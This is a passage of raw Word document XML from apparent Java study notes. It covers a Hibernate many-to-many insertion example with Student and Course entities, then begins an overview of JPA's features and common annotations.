          <w:p w14:paraId="60EE02C9"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25EDB790"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2499B6C4" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60699437"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D67DD18"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="380536E6" w14:textId="77777777" w:rsidR="007570DA"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4BD9C86">
          <v:rect id="_x0000_i2446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17EA26" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Inserting Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E906B"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Here’s how you would insert data in a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55771FD4"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560CE261"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ransaction tx = session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47557F53" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3602760F"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Create Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1777EE4D"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tudent student = new Student();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDB312"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tudent.setName("John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBB519" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EF47CA"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Create Courses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1E3B3"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ourse course1 = new Course();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA949A2"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ourse1.setCourseName("Math 101");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A8C37"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ourse course2 = new Course();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261F4F2"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ourse2.setCourseName("Science 101");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEAF06" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8D3B1E"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Link student with courses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821C1BF"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tudent.getCourses().add(course1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121279AE"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tudent.getCourses().add(course2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2D203" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CFBA12"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ourse1.getStudents().add(student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57221D7A"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ourse2.getStudents().add(student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1C276" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541E0D58"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Save entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2D910"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save(student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E0A76"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save(course1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78642DED"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save(course2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642CDDE" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE07F5C"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x.commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82D1BA" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB49639" w14:textId="77777777" w:rsidR="007570DA"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2A858B">
          <v:rect id="_x0000_i2447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3F7C1" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F746214" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1991"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship is when one entity can have multiple instances of another entity and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE39798" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1991"/>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You use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ManyToMany</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation along with </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinTable</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to define the join table that connects the two entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B85A6" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1991"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">This setup is commonly used in cases like </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Student-Course</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Author-Book</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5BD1A" w14:textId="6D55B704" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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F5364FA">
          <v:rect id="_x0000_i2448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB47F4" w14:textId="3EFAE796" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00264467">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="_Toc196308033"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p w14:paraId="3200AEC2" w14:textId="3A89F640" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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JPA (Java Persistence API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D2144" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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JPA (Java Persistence API) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java specification</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides a set of rules for managing </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relational data</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java applications. It allows Java developers to interact with relational databases using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-relational mapping (ORM)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which simplifies database operations by mapping Java objects to database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473210E8" w14:textId="77777777" w:rsidR="007B3D64"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0371A93">
          <v:rect id="_x0000_i2449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF8100" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64"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Key Features of JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4CC58" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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Object-Relational Mapping (ORM):</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA allows you to map Java objects (entities) to database tables. It abstracts the complexity of SQL and enables developers to interact with the database using Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E022AA" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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RUD Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JPA provides standard methods for </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Update</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CRUD) operations on persistent entities without writing explicit SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E8D4D" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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Entity Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA defines how entities (Java classes) are managed and how they are persisted in a database. It uses annotations like @Entity, @Id, @Table, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FAFFE" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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JPQL (Java Persistence Query Language):</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA defines its own query language called JPQL, which is similar to SQL but operates on entities rather than database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2F8821" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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riteria API:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA offers a type-safe way to build dynamic queries through its Criteria API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50862032" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1992"/>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Entity Lifecycle Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JPA manages the lifecycle of entities through states like </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detached</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Removed</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DFF92" w14:textId="77777777" w:rsidR="007B3D64"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D033006">
          <v:rect id="_x0000_i2450" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="169262FA" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64"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JPA Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBC99F" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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ome common annotations used in JPA are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A28019" w14:textId="77777777" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D64" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1993"/>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Entity</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
